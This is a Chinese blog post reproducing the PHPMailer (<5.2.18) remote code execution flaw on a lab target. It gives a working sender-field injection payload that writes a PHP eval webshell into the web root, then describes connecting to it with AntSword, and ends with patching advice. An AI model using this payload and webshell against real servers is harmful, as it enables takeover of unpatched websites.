编程语言
首页 > 编程语言> > PHPMailer远程命令执行漏洞复现

PHPMailer远程命令执行漏洞复现

作者:互联网

PHPMailer远程命令执行漏洞复现

漏洞简介:

PHPMailer是PHP电子邮件创建及传输类,用于多个开源项目:WordPress, Drupal, 1CRM, SugarCRM, Yii, Joomla!等。

PHPMailer < 5.2.18版本存在安全漏洞,可使未经身份验证的远程攻击者在Web服务器用户上下文中执行任意代码,远程控制目标web应用。

影响版本:

PHPMailer<5.2.18

环境搭建:

这里采用现成靶机

漏洞复现:

aaa

"aaa". -OQueueDirectory=/tmp/. -X/var/www/html/a.php @aaa.com

<?php @eval($_POST['thelostworld']); ?>  注意:(空格很严格)

发送邮件

 显示发送不成功,其实已经发送成功

访问上传的shell文件,发现上传成功 

 蚁剑进行连接,获得后台

 

 

漏洞防御:

目前此漏洞已经修复,建议及时升级更新至PHPMailer 6.5.0。

下载链接:

https://github.com/PHPMailer/PHPMailer

通用安全建议:

对代码进行安全审计,尽早检测潜在的安全漏洞,并增强代码逻辑性。

对用户的输入进行过滤或转义,避免参数可控。

用户应定期更新软件、程序和应用程序,确保应用程序是最新的,以保护系统免受漏洞利用

标签:aaa,PHPMailer,漏洞,复现,com,远程
来源: https://blog.csdn.net/qq_48985780/article/details/121903066